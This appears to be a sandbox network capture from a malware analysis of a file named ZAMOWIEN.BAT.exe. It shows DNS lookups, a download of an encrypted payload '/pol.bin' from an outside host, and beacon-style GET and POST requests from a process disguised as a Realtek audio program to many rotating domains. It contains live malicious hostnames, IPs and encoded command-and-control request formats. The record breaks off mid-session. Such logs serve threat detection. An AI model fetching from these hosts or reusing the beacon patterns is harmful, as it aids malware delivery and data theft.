                                                                                Nov 25, 2024 11:58:46.437798023 CET5624053192.168.11.209.9.9.9
                                                                                Nov 25, 2024 11:58:46.997029066 CET53562409.9.9.9192.168.11.20
                                                                                Nov 25, 2024 11:58:47.157685995 CET53562401.1.1.1192.168.11.20
                                                                                Nov 25, 2024 11:59:01.107327938 CET5089753192.168.11.209.9.9.9
                                                                                Nov 25, 2024 11:59:01.275343895 CET53508979.9.9.9192.168.11.20
                                                                                Nov 25, 2024 11:59:15.385430098 CET5396653192.168.11.209.9.9.9
                                                                                Nov 25, 2024 11:59:15.821439981 CET53539669.9.9.9192.168.11.20
                                                                                Nov 25, 2024 11:59:29.991569042 CET6277753192.168.11.209.9.9.9
                                                                                Nov 25, 2024 11:59:30.102003098 CET53627779.9.9.9192.168.11.20
                                                                                Nov 25, 2024 11:59:43.504280090 CET5273153192.168.11.209.9.9.9
                                                                                Nov 25, 2024 11:59:43.768214941 CET53527319.9.9.9192.168.11.20
                                                                                Nov 25, 2024 11:59:57.329438925 CET6528753192.168.11.209.9.9.9
                                                                                Nov 25, 2024 11:59:57.515285969 CET53652879.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:00:10.873238087 CET5010953192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:00:11.056832075 CET53501099.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:00:24.526606083 CET6380453192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:00:24.632970095 CET53638049.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:00:32.681152105 CET5570453192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:00:32.786787987 CET53557049.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:00:45.912487030 CET6026453192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:00:46.018776894 CET53602649.9.9.9192.168.11.20
                                                                                Nov 25, 2024 12:01:43.477663994 CET5171653192.168.11.209.9.9.9
                                                                                Nov 25, 2024 12:01:43.585242033 CET53517169.9.9.9192.168.11.20
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 25, 2024 11:56:55.504550934 CET192.168.11.201.1.1.10xbb33Standard query (0)enechado.ru.comA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:26.057734966 CET192.168.11.201.1.1.10x631fStandard query (0)www.officinadelpasso.shopA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:41.827888966 CET192.168.11.201.1.1.10x827dStandard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:55.171067953 CET192.168.11.201.1.1.10x9fd2Standard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:08.416037083 CET192.168.11.201.1.1.10x6eeStandard query (0)www.nartex-uf.onlineA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:23.350100040 CET192.168.11.201.1.1.10xebdbStandard query (0)www.newtoppornx1.buzzA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:31.504426956 CET192.168.11.201.1.1.10x5cbcStandard query (0)www.614genetics.onlineA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:45.423242092 CET192.168.11.201.1.1.10xb810Standard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:46.437798023 CET192.168.11.209.9.9.90xb810Standard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:01.107327938 CET192.168.11.209.9.9.90xf38eStandard query (0)www.cg19g5.proA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.385430098 CET192.168.11.209.9.9.90x8b72Standard query (0)www.nuy25c9t.sbsA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:29.991569042 CET192.168.11.209.9.9.90x8273Standard query (0)www.golivenow.liveA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:43.504280090 CET192.168.11.209.9.9.90x4b89Standard query (0)www.kanadeviainova.netA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:57.329438925 CET192.168.11.209.9.9.90x33fbStandard query (0)www.mydreamdeal.clickA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:10.873238087 CET192.168.11.209.9.9.90x5f9bStandard query (0)www.aquax.cloudA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:24.526606083 CET192.168.11.209.9.9.90xbf98Standard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:32.681152105 CET192.168.11.209.9.9.90x8bf8Standard query (0)www.108.foundationA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:45.912487030 CET192.168.11.209.9.9.90x5b0Standard query (0)www.bagazone.onlineA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:01:43.477663994 CET192.168.11.209.9.9.90x2bb3Standard query (0)www.newtoppornx1.buzzA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 25, 2024 11:56:55.619509935 CET1.1.1.1192.168.11.200xbb33No error (0)enechado.ru.com103.83.194.50A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:26.389983892 CET1.1.1.1192.168.11.200x631fNo error (0)www.officinadelpasso.shopofficinadelpasso.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:26.389983892 CET1.1.1.1192.168.11.200x631fNo error (0)officinadelpasso.shop195.110.124.133A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:41.931122065 CET1.1.1.1192.168.11.200x827dNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:41.931122065 CET1.1.1.1192.168.11.200x827dNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:55.282571077 CET1.1.1.1192.168.11.200x9fd2No error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:57:55.282571077 CET1.1.1.1192.168.11.200x9fd2No error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:08.755079985 CET1.1.1.1192.168.11.200x6eeNo error (0)www.nartex-uf.online31.31.196.177A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:23.451129913 CET1.1.1.1192.168.11.200xebdbName error (3)www.newtoppornx1.buzznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:31.673877954 CET1.1.1.1192.168.11.200x5cbcNo error (0)www.614genetics.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:46.997029066 CET9.9.9.9192.168.11.200xb810No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:46.997029066 CET9.9.9.9192.168.11.200xb810No error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:47.157685995 CET1.1.1.1192.168.11.200xb810No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:58:47.157685995 CET1.1.1.1192.168.11.200xb810No error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:01.275343895 CET9.9.9.9192.168.11.200xf38eNo error (0)www.cg19g5.pro154.88.22.105A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)www.nuy25c9t.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:15.821439981 CET9.9.9.9192.168.11.200x8b72No error (0)b1-3-r111.kunlundns.top43.155.76.124A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:30.102003098 CET9.9.9.9192.168.11.200x8273No error (0)www.golivenow.live66.29.149.46A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:43.768214941 CET9.9.9.9192.168.11.200x4b89No error (0)www.kanadeviainova.netkanadeviainova.netCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:43.768214941 CET9.9.9.9192.168.11.200x4b89No error (0)kanadeviainova.net81.88.58.216A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:57.515285969 CET9.9.9.9192.168.11.200x33fbNo error (0)www.mydreamdeal.click104.21.27.59A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 11:59:57.515285969 CET9.9.9.9192.168.11.200x33fbNo error (0)www.mydreamdeal.click172.67.169.6A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:11.056832075 CET9.9.9.9192.168.11.200x5f9bNo error (0)www.aquax.cloud45.81.23.25A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:24.632970095 CET9.9.9.9192.168.11.200xbf98Name error (3)www.75178.clubnonenoneA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:32.786787987 CET9.9.9.9192.168.11.200x8bf8No error (0)www.108.foundation13.248.169.48A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:32.786787987 CET9.9.9.9192.168.11.200x8bf8No error (0)www.108.foundation76.223.54.146A (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:00:46.018776894 CET9.9.9.9192.168.11.200x5b0Name error (3)www.bagazone.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                Nov 25, 2024 12:01:43.585242033 CET9.9.9.9192.168.11.200x2bb3Name error (3)www.newtoppornx1.buzznonenoneA (IP address)IN (0x0001)false
                                                                                • enechado.ru.com
                                                                                • www.officinadelpasso.shop
                                                                                • www.vayui.top
                                                                                • www.tals.xyz
                                                                                • www.nartex-uf.online
                                                                                • www.614genetics.online
                                                                                • www.prhmcjdz.tokyo
                                                                                • www.cg19g5.pro
                                                                                • www.nuy25c9t.sbs
                                                                                • www.golivenow.live
                                                                                • www.kanadeviainova.net
                                                                                • www.mydreamdeal.click
                                                                                • www.aquax.cloud
                                                                                • www.108.foundation
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.11.2049741103.83.194.50804604C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:56:55.795540094 CET167OUTGET /pol.bin HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                Host: enechado.ru.com
                                                                                Cache-Control: no-cache
                                                                                Nov 25, 2024 11:56:55.967170000 CET1289INHTTP/1.1 200 OK
                                                                                Date: Mon, 25 Nov 2024 10:56:55 GMT
                                                                                Server: Apache
                                                                                Last-Modified: Mon, 25 Nov 2024 09:44:12 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 289856
                                                                                Content-Type: application/octet-stream
                                                                                Data Raw: 6b 18 89 8e af 1d 5c b1 be 6f 51 a9 b1 55 15 8f 37 ba 88 fb 6a f0 a6 11 be 55 9d a4 00 a3 82 93 19 35 11 22 62 fd 1f 85 97 2f 08 f2 78 64 6f a5 11 2e ec 34 aa 06 70 c2 e5 e6 cb 80 84 db 91 21 aa da 33 c6 6b 74 db f9 85 73 97 d4 2a 54 f1 ca ae 41 a3 51 8a e6 2d fe f2 01 02 8a 5f 46 1b dd 82 1d cc 7b 53 65 ab 23 81 53 79 20 44 22 bd aa bf 29 f8 9f 80 3d 8b 1c af 2a 72 4a a1 d3 d0 19 7f ab f1 b9 5e bf 22 61 7f 2f 5a 99 d8 e1 df db ce b0 42 eb f7 d3 8a 00 8e 81 b0 dd 0d 84 39 92 90 04 72 8b c7 01 ed 9a c8 e8 e9 a5 06 04 12 a7 dc a0 2e f4 b6 9d a2 9d 6f d6 a0 ff 5a a2 b1 44 6c d6 1e 3a 64 45 60 68 24 bd ec 3e 30 3f 71 f0 06 37 b9 ed 32 ba aa af 37 bf 24 9d eb 7d 96 66 0e 52 46 ff fd 26 b2 91 41 76 a7 99 b8 fe ef f4 21 94 c0 98 bc ba e7 ab 91 2e 55 0d 39 09 44 e2 c9 c5 93 fc fa 01 cc a7 3e 07 33 88 cb 00 19 25 0b 7a 31 3b da 05 b0 1a da bc 6e a1 10 b8 06 dc 3a da 52 dc 87 11 d4 ec 57 84 76 af 8b 63 12 31 dd e4 2d 9c 76 c0 d2 a5 f1 de 21 cc dc ed 52 29 cf 25 33 7d 8f d8 64 1f 3d ba 67 bc b5 ed de 13 f2 1f [TRUNCATED]
                                                                                Data Ascii: k\oQU7jU5"b/xdo.4p!3kts*TAQ-_F{Se#Sy D")=*rJ^"a/ZB9r.oZDl:dE`h$>0?q727$}fRF&Av!.U9D>3%z1;n:RWvc1-v!R)%3}d=g|v3HDdnY0?!8Yg^De$-"KhDKfLYFwwcgt/l}AxdoC1wKn>ej&8J8SH4p|VwXt_+9e?|*!)UkMN435~[gEF[uL%#M8.Mh<-rOzFBW-=ipC}5]|9O_:>%K>n1Oj-09ASP\)#X/gXIpF#3<WHij}9Bc-uiEu tp(}al8"E!|;PlO4RkzDo`L_:hQC}zVC=@>}pE&,HjwY/<du*e?o18>AfhpHE7.$|["1wvVwWy9T"[3\@BX:?-bU{A9>ooV=* [TRUNCATED]
                                                                                Nov 25, 2024 11:56:55.967226982 CET1289INData Raw: 83 6c 3c a6 3b d3 78 5d 82 b2 29 81 e7 d6 0d 25 69 af 94 77 99 a3 d6 16 38 f9 71 dd dc 5b 5c 09 9d 33 f0 51 09 76 b3 a6 6c e2 a9 b3 0d e3 2b b6 3b 5e 1d af 0d ed ed 60 5f 16 08 b6 1c 48 f5 35 17 57 b7 de 09 08 8d 17 c5 08 30 8d 44 6f fb cc 96 d4
                                                                                Data Ascii: l<;x])%iw8q[\3Qvl+;^`_H5W0DoVY5G}!kP5fgEbgzhtsAQ-_F{Se#Sy D")=*rJqK^+^[brlW$sBKA
                                                                                Nov 25, 2024 11:56:55.967277050 CET1289INData Raw: 68 74 db f9 81 73 97 d4 d5 ab f1 ca 16 41 a3 51 8a e6 2d fe b2 01 02 8a 5f 46 1b dd 82 1d cc 7b 53 65 ab 23 81 53 79 20 44 22 bd aa bf 29 f8 9f 80 3d 8b 1c af 2a 72 4a 19 d3 d0 19 71 b4 4b b7 5e 0b 2b ac 5e 97 5b d5 15 c0 8b b3 a7 c3 62 9b 85 bc
                                                                                Data Ascii: htsAQ-_F{Se#Sy D")=*rJqK^+^[brlW$sBKAJKZDY%_\-nFb!kUuEd>3+${:;_n:RWrcR1-v
                                                                                Nov 25, 2024 11:56:55.967320919 CET1289INData Raw: 0d 5f 16 03 1c 91 11 1e 08 da cd 5c 2d 19 8e 6e d7 1d f1 95 14 f4 ed 0c c1 46 d5 62 13 1f c4 f1 85 9e 88 07 21 94 c0 98 bc ba e7 ab c1 6b 55 0d 75 08 45 e2 ce 64 bf 9c fa 01 cc a7 3e 07 33 88 2b 00 1b 24 00 7b 3a 3b da 5f b4 1a da bc 6e a1 10 b8
                                                                                Data Ascii: _\-nFb!kUuEd>3+${:;_n:RWrcR1-v!R)%3}d=c|vHDd~Y0?!8Yg^De$-"KhDKfLYFwwcgt
                                                                                Nov 25, 2024 11:56:55.967365026 CET1289INData Raw: a0 14 e1 bd 9e d5 89 21 fa f2 ab 3e 15 f3 5b cf 21 8e a1 56 0a 71 b7 c5 32 ee 27 47 b3 d0 29 d3 3f ee 59 10 05 1e 53 d0 87 89 dc d8 e2 24 fa 82 c2 94 0b 8f 62 5e f2 2d be e5 b8 e0 11 90 2b ac 23 b9 b1 8f 6f 08 24 fb 25 20 8a 8e 53 ce 9b 00 2d 74
                                                                                Data Ascii: !>[!Vq2'G)?YS$b^-+#o$% S-tMu3X1\OyBiM:]Hd@d z%e-,YRqOtKxTQ)'h$TPv[X.`$V)08FFxrv%"jl^Gz-^o)
                                                                                Nov 25, 2024 11:56:55.967406034 CET1289INData Raw: 87 ab 44 8a 9d c8 19 ee 02 b0 d5 19 52 5f d6 85 50 02 3d df aa f1 ed 45 1c e6 ea 23 1c 0e 84 76 83 3b bb 27 e1 62 a5 d4 c6 9c 8e 66 04 c0 f7 7a d2 02 ff a8 5a 87 d6 aa b4 8a 7d ae 45 cb 36 49 af c1 8d 00 36 5f 8d ed a1 8a c9 90 59 e4 c8 84 75 84
                                                                                Data Ascii: DR_P=E#v;'bfzZ}E6I6_YuP7oyL%#<jm-rjAg-h,M5)1Yd"CRC5dd.rG+gv.4iPh|y:g#X+PDd3g\@WU
                                                                                Nov 25, 2024 11:56:55.967452049 CET1289INData Raw: 3c f7 ca 43 f6 41 8d 40 44 f6 d9 55 e6 7c 9c 9e 3e 9e b1 7f 4b 76 ae df 66 4b ce fb 1b ea 2d 58 08 05 31 15 cb 9a 80 67 00 97 08 e6 8d e7 ec ad 04 f9 b2 d5 6a 40 b7 52 ed 74 78 7a bf 13 cb 20 f3 aa 59 9c 23 83 26 11 58 50 c9 90 b1 4a 78 b1 ed cc
                                                                                Data Ascii: <CA@DU|>KvfK-X1gj@Rtxz Y#&XPJx$O}q+rj/j7d`ezU=U }Jj,[ip(}I4:Ck"Esos%.52eK4+`eFW}*6x[4r>L8i+@D}J1=+
                                                                                Nov 25, 2024 11:56:55.967497110 CET1289INData Raw: eb ad 10 4c e1 ce d2 2c ca 3b ba e9 5a 62 c1 ab eb 10 e5 75 82 ce 5c 06 3f fb c9 bf 3b 50 26 bc 25 f1 b9 d7 7e 1a 4f 94 42 93 1d d3 74 ff 09 cf f1 42 77 17 63 96 a9 69 dc 4c 28 d7 16 14 d2 fa b1 43 9f 5a f0 4d 90 3d 10 c8 b7 24 93 49 ac 89 48 1f
                                                                                Data Ascii: L,;Zbu\?;P&%~OBtBwciL(CZM=$IH+8?DEa1HW*jx1,u|{/3R?]ATCzfZb\srs1?sh^z=+u0`PX#S0b~bFXqC
                                                                                Nov 25, 2024 11:56:55.967541933 CET1289INData Raw: f3 d0 6f 4d ec 13 83 17 41 79 e0 42 74 1d b5 9e e3 e4 25 1b 3c f9 0d b1 3a 7d 8c da 00 8d a2 2e 0c 24 c5 31 5b 7f 8e df e8 c5 cc 2b 8b 9b c9 48 16 5b 3e 76 8f ee e9 22 02 2c eb d2 32 3a cf 11 ac a0 7d df 2d 4d 26 e5 c1 d1 62 93 3c 5a a0 19 1c 40
                                                                                Data Ascii: oMAyBt%<:}.$1[+H[>v",2:}-M&b<Z@B&<f+A:)!+,f>Qp?#K-uXf_wnBy|BK20_~A1s:4p4oL5-~/{z[2$q*Z.M8qe"Aj1yg
                                                                                Nov 25, 2024 11:56:55.967583895 CET1289INData Raw: 3a 2d f4 71 04 f0 08 79 b4 73 56 a3 87 aa 41 a2 ed 42 30 6c c4 f9 81 cf 7a 6d 44 77 f2 1e 09 a3 da 9a f2 26 23 bd 2d bc 98 37 cb 1a 3e 34 42 44 b4 f4 07 46 34 15 0a 42 8e bb 82 3f ea 61 de 3b 8e f6 87 b5 fb c7 58 3d 55 09 f2 25 08 a2 2a b5 ec 2b
                                                                                Data Ascii: :-qysVAB0lzmDw&#-7>4BDF4B?a;X=U%*+&v'CgFW->H>A]nf=R<;TOReV};^Prp{fgS2_[Qgoh5-7ik3/z=Btps3P&9{Se
                                                                                Nov 25, 2024 11:56:56.138942003 CET1289INData Raw: 16 40 fe 4f 7e 1b 31 a6 0f 57 02 08 a0 ed a2 cd 47 99 d1 7e 68 48 f8 d8 7b 6b 55 74 5f 40 f0 39 e6 a6 d8 66 0c db e4 49 b4 4d 28 dd ca 58 25 12 6e c9 4e a9 8c 55 79 22 76 9d b0 67 88 ef dd 60 0a a4 21 50 15 d0 b4 d2 28 d5 25 e1 12 96 34 5e df 0a
                                                                                Data Ascii: @O~1WG~hH{kUt_@9fIM(X%nNUy"vg`!P(%4^2t-P0} b0<V4\LPFkt^@E}Yo$rxzD$OyoPh8]GlEQyqm4:<zI3r


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.11.2049742195.110.124.133807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:57:26.588319063 CET463OUTGET /vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.officinadelpasso.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:57:26.782552004 CET367INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:26 GMT
                                                                                Server: Apache
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.11.2049743172.67.145.234807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:57:42.032996893 CET709OUTPOST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 53 57 64 37 76 57 57 49 4f 4d 78 64 73 45 50 67 61 48 52 56 37 32 4b 65 54 38 37 31 64 71 4d 43 32 51 3d 3d
                                                                                Data Ascii: 2WLcH=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5SWd7vWWIOMxdsEPgaHRV72KeT871dqMC2Q==
                                                                                Nov 25, 2024 11:57:42.266962051 CET885INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:42 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nn%2FY3DFf23%2Fnv1pl6kKEYYRLmOSlP4zMhfz%2BIeD9s4j5GkPjBr%2BKxJuNfO9sT%2F0ZTQdRD84sox9j22%2Blyghgq9uOesy5pAxWfKPh%2B5fcGeAAPsiR3y1tFgxjBQrz68l"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e811e8e0c0e43da-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97323&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                Nov 25, 2024 11:57:42.267007113 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.11.2049744172.67.145.234807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:57:44.662894964 CET729OUTPOST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
